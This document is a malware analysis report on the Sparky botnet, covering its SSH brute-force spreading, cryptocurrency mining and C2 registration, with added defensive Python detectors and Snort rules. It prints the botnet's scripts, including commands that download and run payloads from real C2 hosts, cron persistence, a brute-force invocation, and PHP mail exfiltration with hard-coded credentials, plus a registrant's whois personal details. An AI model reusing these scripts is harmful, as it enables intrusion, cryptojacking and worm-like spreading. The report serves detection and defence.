Sparky Botnet Analysis Report
1 Background

Mining incidents have been frequent in recent days. Most of them spread through compromised hosts. This incident, however, was not only used to recruit mining machines but also to expand the botnet. If the latest vulnerability were exploited for spreading, the impact would be far greater. The Sparky botnet spread by SSH brute-force cracking, attacking LAN users from the discovered zombie hosts. When a new zombie host is found, Sparky performs CPU or GPU mining according to the capabilities of that host.

2 Attack Process

The Sparky botnet attack process was analyzed in three aspects: injection, mining, and spreading.

2.1 Injection

In this sample, malicious scripts were injected into a zombie host. The attacker accessed the user host by SSH brute-force cracking and executed the downloaded malicious scripts. The IP address of the zombie host was 138.68.160.77.

    "commands": {
        "cd /tmp;wget http://67.205.129.169/.foomin.sh || curl -O http://www.karaibe.us/.foo/min.sh; chmod +x min.sh; nohup ./min.sh; ./min.sh >> /dev/null &": {
            "count": 1,
            "IP": [
                "138.68.160.77"        (victim IP)
            ]
        },

The min.sh script had the following functions: downloading and executing the mining program, spreading, and registering the zombie host with the C2 server. The address of the C2 server was hxxp://www.karaibe.us/.foo/remote/info.php. Botnet information such as the IP address of the zombie host and the date was sent. After registration with the C2 server completed, the zombie host automatically deleted the script.
    SERVERIP=`curl http://www.karaibe.us/.foo/remote/info.php`
    curl -d "info=NEWROOT&data=SERVER---> $(whoami)@$SERVERIP <br>DATE---> $(date) <br>ARCH---> $ARCH" http://www.karaibe.us/.foo/remote/info.php > /dev/null
    cd /tmp
    rm -rf $0
    rm -rf min.sh
    rm -rf /tmp/min.sh

2.2 Mining

Code for mining is as follows:

    cd /tmp
    wget http://67.205.129.169/.foo/ryo.tgz || curl -O http://www.karaibe.us/.foo/ryo.tgz || lwp-download http://67.205.129.169/.foo/ryo.tgz
    tar zxvf ryo.tgz
    rm -rf ryo.tgz
    cd .bin
    nohup ./start > /dev/null &
    lspci | grep VGA
    if [ $? -eq 0 ]; then
        cd /tmp
        mkdir .x
        cd /tmp/.x
        wget http://67.205.129.169/.foo/xmstak.tgz || curl -O http://karaibe.us/.foo/xmstak.tgz
        tar zxvf xmstak.tgz
        rm -rf xmstak.tgz
        cd .xmstak
        nohup ./start &
        ./start &
    fi

The zombie host downloaded the CPU mining software ryo.tgz from the C2 server and executed it. If a GPU was present (lspci reports a VGA device), the zombie host went on to download the GPU mining software. In ryo.tgz, the zombie host executed the start script for mining, consuming at most 95% of CPU resources. The script was mainly used for mining with the CPU's compute capability:

    if [ "$ARCH" == "i686" ]; then
        ./x86/daemon -t $(nproc) -a cryptonight -o pool.ryo.hashvault.pro:5555 -u RYoSrHKVfJiFooGhb4SnN5EFSKWrGZ5v9LZPznSkaYXGhgSaQmKX9dd6xrYrMNQXVcb1VqTgju6aBFtRNkb4VUgVFG9nQPU1iJD -p $(cat .miner) --donate-level 1 --max-cpu-usage 95 -B > /dev/null &
    elif [ "$ARCH" == "x86_64" ]; then
        ./h64 -s $hh
        ./md64 -t $(nproc) -a cryptonight-heavy -o pool.ryo.hashvault.pro:5555 -u RYoSrHKVfJiFooGhb4SnN5EFSKWrGZ5v9LZPznSkaYXGhgSaQmKX9dd6xrYrMNQXVcb1VqTgju6aBFtRNkb4VUgVFG9nQPU1iJD -p $(cat .miner) --donate-level 1 --max-cpu-usage 95 -B > /dev/null &
    fi

The mining pool was pool.ryo.hashvault.pro.
By registering scheduled Linux tasks, zombie hosts re-registered with the C2 server every 30 minutes so that the C2 server could monitor them. Through nanor.sh, the Sparky zombie scripts were continuously pushed to zombie hosts.

    mkdir /var/tmp/.nano
    curl -s http://www.karaibe.us/.foo/nanor.sh > /var/tmp/.nano/nano.sh
    chmod +x /var/tmp/.nano/nano.sh
    echo '*/30 * * * * /var/tmp/.nano/nano.sh &> /dev/null
    @reboot /bin/mkdir /var/tmp/.ssh && /usr/bin/curl -s http://www.karaibe.us/.foo/nanor.sh > /var/tmp/.ssh/nano.sh && /bin/chmod +x /var/tmp/.ssh/nano.sh && /var/tmp/.ssh/nano.sh' > cron.d

In xmstak.tgz, the start script made the zombie hosts perform GPU mining and changed the mining pool to 45.77.60.40:5555. Other information remained unchanged.

    ./stak/ld-linux-x86-64.so.2 --library-path stak stak/xmr-stak -o 45.77.60.40:5555 -u RYoSrD2ZsWoSijRyK9bknfSEtuXo9AZjxdCkqiLMNNg63Vy6hjFqL33dQxu5gEmvtx753Wf1n5b4nJgUqGv29nM3EADVsAhgNop -p AGUA-$(cat .miner) --currency sumokoin -r 1 --noCPU > /dev/null &

2.3 Spreading

Code for spreading was as follows:

    cd .vd
    wget http://67.205.129.169/.foo/sslm.tgz || curl -O http://www.karaibe.us/.foo/sslm.tgz || lwp-download http://67.205.129.169/.foo/sslm.tgz
    tar zxvf sslm.tgz
    rm -rf sslm.tgz
    cd .sslm
    nohup ./start > /dev/null &

In this sample, sslm.tgz was downloaded and its start script was executed to start a registration task that reported the date, current directory, processor, and GPU information. "info=HAIDUC-STARTED&data" was a fixed character string in transit and could be extracted as a botnet/Trojan horse/worm rule. After the preceding actions completed, the sparky.sh script was executed for brute-force cracking on 192.168.x.x/255. This network segment is an intranet range, which increased the likelihood of brute-force successes.
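The persistence in 2.2 (a cron entry every 30 minutes plus an @reboot entry, both pointing at scripts in hidden directories under /var/tmp) and the staging of the spreading toolkit in hidden directories under /tmp can be audited on a host from its crontab text. The following Python is an added example for this report, not code from the report or from the botnet. The crontab it scans is constructed: the two cron lines written by the script above are embedded alongside benign entries. The hidden-directory and download-then-execute heuristics and the known-host list are this example's own assumptions.

```python
import re

# Heuristics drawn from the persistence script in the report (assumptions of this example):
# hidden directories under /tmp or /var/tmp, the report's C2 hosts, and a
# "download, chmod, execute" chain inside a single cron entry.
HIDDEN_TMP_DIR = re.compile(r"/(?:var/)?tmp/\.[A-Za-z0-9_-]+")
DOWNLOADER = re.compile(r"\b(?:curl|wget|lwp-download)\b")
EXEC_AFTER_DOWNLOAD = re.compile(r"(?:chmod\s+\+x|&&\s*/\S+|;\s*\./)")
KNOWN_C2_HOSTS = {"www.karaibe.us", "karaibe.us", "67.205.129.169"}

# Constructed crontab: two benign entries plus the two lines the report's script writes.
SAMPLE_CRONTAB = """\
# constructed sample for this example
PATH=/usr/bin:/bin
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/30 * * * * /var/tmp/.nano/nano.sh &> /dev/null
@reboot /bin/mkdir /var/tmp/.ssh && /usr/bin/curl -s http://www.karaibe.us/.foo/nanor.sh > /var/tmp/.ssh/nano.sh && /bin/chmod +x /var/tmp/.ssh/nano.sh && /var/tmp/.ssh/nano.sh
@daily /usr/local/bin/backup.sh
"""


def parse_crontab(text: str) -> list:
    """Split crontab text into (schedule, command) tuples.

    Comments, blank lines and VAR=value assignments are skipped. Entries may use
    either the five-field schedule or an @reboot/@daily style keyword.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):
            continue
        if line.startswith("@"):
            sched, _, cmd = line.partition(" ")
        else:
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue  # malformed entry; a stricter auditor might flag it
            sched, cmd = " ".join(parts[:5]), parts[5]
        entries.append((sched, cmd.strip()))
    return entries


def audit_crontab(text: str) -> list:
    """Return (schedule, command, reasons) for entries matching the persistence pattern."""
    findings = []
    for sched, cmd in parse_crontab(text):
        reasons = []
        if HIDDEN_TMP_DIR.search(cmd):
            reasons.append("runs from a hidden directory under /tmp or /var/tmp")
        if any(host in cmd for host in KNOWN_C2_HOSTS):
            reasons.append("references a known C2 host")
        if DOWNLOADER.search(cmd) and EXEC_AFTER_DOWNLOAD.search(cmd):
            reasons.append("downloads and executes in one entry")
        if sched == "@reboot" and DOWNLOADER.search(cmd):
            reasons.append("@reboot entry fetches remote content")
        if reasons:
            findings.append((sched, cmd, reasons))
    return findings


if __name__ == "__main__":
    for sched, cmd, reasons in audit_crontab(SAMPLE_CRONTAB):
        print(f"{sched}  {cmd[:60]}...")
        for r in reasons:
            print(f"    - {r}")
```

In practice the input would be the output of crontab -l for every user plus the files under /etc/cron.d; on the sample above the */30 entry is flagged for its hidden directory alone, and the @reboot entry trips all four checks.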
The start script was as follows:

    #!/bin/bash
    pwd > dir.dir
    dir=`cat dir.dir`
    SERVERIP=`curl http://www.karaibe.us/.foo/remote/info.php --connect-timeout 10`
    echo "$(whoami)@$SERVERIP DATE--->$(date) SCANDIR: $(pwd) PROCESORS: $(nproc) VIDEO: $(lspci | grep VGA)" > data.file
    data=`cat data.file`
    curl -d "info=HAIDUC-STARTED&data=$data" http://www.karaibe.us/.foo/remote/info.php --connect-timeout 10
    ./sparky.sh 192.168 ./rand > /dev/null &
    sleep 20

In sparky.sh, the code that invokes brute-force cracking was executed (shown below). Its main function was to set the number of threads (300 in the script) and the port (22, SSH, by default), select the password table (which varied with the attacked network segment), and pass the attack payload (the same payload seen in this incident).

    passfile=pass
    threads=300
    port=22
    SERVERIP=`curl http://www.karaibe.us/.foo/remote/info.php --connect-timeout 10`
    dir=$(cat dir.dir)
    curl -s http://www.karaibe.us/.foo/feed/feedp.php --connect-timeout 10 > pass
    sleep 1
    sizepass=$(wc -c < pass)
    minsizep=6
    # if the password file is smaller than 6 bytes, create the password file automatically;
    # and if the scanned class is the local network, load the big password file
    if [ ! $sizepass -ge $minsizep ]; then
        cat .classpass > pass          # password table
    elif [ $1 = 192.168 ]; then
        cat .pass > pass
    fi
    ##################################
    # Attack process: number of threads, network segment, port, attack payload
    ./haiduc $threads -b $1 $passfile $port "cd /tmp;wget http://67.205.129.169/.foo/min.sh || curl -O http://www.karaibe.us/.foo/min.sh; chmod +x min.sh; nohup ./min.sh >> /dev/null &"
    sleep 3

haiduc is an ELF file. The following information can be obtained after the file is unpacked:
The key code in haiduc is the brute-force cracking routine. The following figure shows how the brute-force cracking code is invoked. Once cracking succeeds, the malicious code is executed on the new zombie host.
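From the victim's side, the brute-force stage described in 2.3 (300 threads against port 22 across 192.168.x.x) appears as a burst of sshd authentication failures from a single source, typically followed by one success. The following Python is an added example, not code from the report: it parses constructed sshd syslog lines (the year is assumed, since syslog omits it) and flags sources that exceed a failure threshold inside a sliding window, recording whether a successful login followed the failures.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd log lines in traditional syslog format (not from the report).
SAMPLE_AUTH_LOG = """\
Sep  9 10:00:01 host sshd[2001]: Failed password for root from 192.168.1.23 port 50122 ssh2
Sep  9 10:00:01 host sshd[2002]: Failed password for invalid user admin from 192.168.1.23 port 50123 ssh2
Sep  9 10:00:02 host sshd[2003]: Failed password for root from 192.168.1.23 port 50124 ssh2
Sep  9 10:00:02 host sshd[2004]: Failed password for root from 192.168.1.23 port 50125 ssh2
Sep  9 10:00:03 host sshd[2005]: Failed password for root from 192.168.1.23 port 50126 ssh2
Sep  9 10:00:03 host sshd[2006]: Accepted password for root from 192.168.1.23 port 50127 ssh2
Sep  9 10:05:00 host sshd[2100]: Failed password for alice from 10.0.0.8 port 41000 ssh2
Sep  9 10:07:30 host sshd[2101]: Accepted publickey for alice from 10.0.0.8 port 41001 ssh2
"""

ASSUMED_YEAR = "2018"  # syslog lines carry no year; assumption of this example

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)


def parse_auth_log(text: str) -> list:
    """Return (timestamp, result, user, source_ip) tuples for sshd auth lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(ASSUMED_YEAR + " " + m["ts"], "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["ip"]))
    return events


def find_bruteforce(events, window_s: int = 60, threshold: int = 5) -> dict:
    """Flag sources with >= threshold failures inside any window_s-second window.

    Returns {ip: {"failures": peak_in_window, "success_after": bool}} where
    success_after is True if an Accepted login from that source came at or
    after its last failure, i.e. the guessing may have worked.
    """
    by_ip = defaultdict(list)
    for ts, result, _user, ip in events:
        by_ip[ip].append((ts, result))

    flagged = {}
    for ip, evs in by_ip.items():
        evs.sort()
        fails = [t for t, r in evs if r == "Failed"]
        # sliding window over the sorted failure timestamps
        peak, start = 0, 0
        for end in range(len(fails)):
            while (fails[end] - fails[start]).total_seconds() > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            last_fail = fails[-1]
            success_after = any(r == "Accepted" and t >= last_fail for t, r in evs)
            flagged[ip] = {"failures": peak, "success_after": success_after}
    return flagged


if __name__ == "__main__":
    for ip, info in find_bruteforce(parse_auth_log(SAMPLE_AUTH_LOG)).items():
        print(ip, info)
```

The threshold and window are deliberately low here so the constructed sample trips them; against a real /var/log/auth.log a source hitting hundreds of failures per minute, as a 300-thread scanner produces, stands out with far less tuning, and the success_after flag is the line worth paging on.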
After spreading is complete, finish.php is executed to perform secondary registration with the email C2 server. The details, including the C2 email address hoffmannklaus254@gmail.com and the sending address tisdialog@tis-dialog.ru, are as follows:

    $whoami = trim(shell_exec("whoami"));
    $IP = shell_exec("curl -s http://www.karaibe.us/.foo/remote/info.php > /dev/null");
    $to = "hoffmannklaus254@gmail.com";
    $server = "smtp.tis-dialog.ru";
    $user = "tisdialog@tis-dialog.ru";
    $pass = "tisdialog";
    $port = "25";
    $letter = file_get_contents($argv[1]);
    $letter2 = str_replace("\n", "<BR>", $letter);
    $subject = trim($argv[2])." {$whoami}@{$IP}";
    if (send($to, $user, $user, $subject, $letter2, $server, $user, $pass, $port)) {
        print "OK\n";
    } else {
        mail($to,$subject,$letter);
    }

3 Threat Intelligence Tracking

3.1 C2 Domain Name

The C2 domain name www.karaibe.us was first registered on September 8, 2018.
The whois information showed that the registrant email address was spywebs2009@hotmail.com:

    Registrant Email: spywebs2009@hotmail.com
    Registrant Application Purpose: P1
    Registrant Nexus Category: C11
    Registry Admin ID: C163274B60211452FA3E6D531C1732D56-NSR
    Admin Name: Beatriz Callau Llopis
    Admin Organization:
    Admin Street: Avda Jaime I 51 P05
    Admin Street:
    Admin Street:
    Admin City: Castellon
    Admin State/Province: Castellon
    Admin Postal Code: 12001
    Admin Country: ES
    Admin Phone: +34.697660199
    Admin Phone Ext:
    Admin Fax:
    Admin Fax Ext:
    Admin Email: spywebs2009@hotmail.com

3.2 Email Address

The C2 mailbox account hoffmannklaus254@gmail.com and its password were hard-coded in the script. However, the password had been changed by the time of a later access attempt. During the password-recovery process, it was found that the mobile number used by the hacker ended with 33 and the email address used for Gmail registration was spywebs2009@hotmail.com.
The email was sent from tisdialog@tis-dialog.ru, and the password was tisdialog. No email was found after logging in to the mailbox.
However, a phishing email could be found among the other sent emails.
4 Analysis Conclusion

The following conclusions can be drawn from the analysis of the attack means and the threat intelligence tracking:

1. Common botnet controllers spread viruses by using spam services or other vulnerabilities. The botnet discovered this time is capable of self-spreading, similar to a worm.
2. The botnet controllers are also operating other malicious services, such as spam services.

Appendix: IOC

www.karaibe.us
hoffmannklaus254@gmail.com

- Character string indicating zombie hosts online: Info=NEWROOT&data=SERVER--->
  Snort rule for zombie hosts coming online:

      flow: established; pkt_data; content: "info|3d|NEWROOT|26|data|3d|SERVER|2d||2d||2d||3e|"; nocase;

- Character string for mining by a registered zombie host: Info=NEW-MINER-RYO&data=$
  Snort rule for mining:

      flow: established; pkt_data; content: "info|3d|NEW|2d|MINER|2d|RYO|26|data|3d 24|"; nocase;

- Character string for starting brute-force cracking: Info=HAIDUCSCAN&data=
  Snort rule for starting brute-force cracking:

      flow: established; pkt_data; content: "info|3d|HAIDUCSCAN|26|data|3d|"; nocase;
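The registration strings in this appendix, and the HAIDUC-STARTED string noted in 2.3, are fixed substrings of the HTTP POST bodies the scripts send, which is why they translate directly into Snort content matches. The following Python is an added example, not code from the report: it converts the appendix's Snort content strings (with |hh| hex escapes) into the byte patterns they match, adds a pattern for the HAIDUC-STARTED string (this example's own assumption, since the report gives no rule for it), and runs them case-insensitively, as the rules' nocase modifier does, over constructed POST bodies modelled on the curl -d calls in the scripts.

```python
import re

# Snort content strings: the first three are the report's own rules, the fourth is an
# assumption of this example built from the "info=HAIDUC-STARTED&data" string in 2.3.
SNORT_CONTENTS = {
    "zombie-online": "info|3d|NEWROOT|26|data|3d|SERVER|2d||2d||2d||3e|",
    "miner-registered": "info|3d|NEW|2d|MINER|2d|RYO|26|data|3d 24|",
    "bruteforce-started": "info|3d|HAIDUCSCAN|26|data|3d|",
    "haiduc-started": "info|3d|HAIDUC|2d|STARTED|26|data|3d|",
}

# A |...| group holds whitespace-separated hex byte pairs; text outside is literal.
_HEX_RUN = re.compile(r"\|([0-9A-Fa-f\s]*)\|")


def snort_content_to_bytes(content: str) -> bytes:
    """Translate a Snort content string into the raw byte pattern it matches."""
    out = bytearray()
    pos = 0
    for m in _HEX_RUN.finditer(content):
        out += content[pos:m.start()].encode("latin-1")
        out += bytes.fromhex(m.group(1).replace(" ", ""))
        pos = m.end()
    out += content[pos:].encode("latin-1")
    return bytes(out)


def match_payload(payload: bytes, nocase: bool = True) -> list:
    """Return the names of the rules whose content pattern occurs in payload.

    nocase mirrors the Snort modifier: both haystack and pattern are lowercased.
    """
    hay = payload.lower() if nocase else payload
    hits = []
    for name, content in SNORT_CONTENTS.items():
        pat = snort_content_to_bytes(content)
        if (pat.lower() if nocase else pat) in hay:
            hits.append(name)
    return hits


# Constructed HTTP POST bodies modelled on the curl -d calls in the report's scripts.
SAMPLE_BODIES = {
    "online": b"info=NEWROOT&data=SERVER---> root@10.0.0.5 <br>DATE---> Mon <br>ARCH---> x86_64",
    "miner": b"info=NEW-MINER-RYO&data=$ARCH x86_64",
    "scan": b"info=HAIDUCSCAN&data=192.168",
    "started": b"info=HAIDUC-STARTED&data=root@10.0.0.5 DATE--->Mon SCANDIR: /tmp/.vd/.sslm",
    "benign": b"info=login&user=alice",
}


if __name__ == "__main__":
    for label, body in SAMPLE_BODIES.items():
        print(f"{label:8s} -> {match_payload(body)}")
```

The matcher is byte-oriented on purpose: Snort matches on raw payload, so a detector that decodes the body as text first can be fooled by encoding tricks that the byte pattern is not.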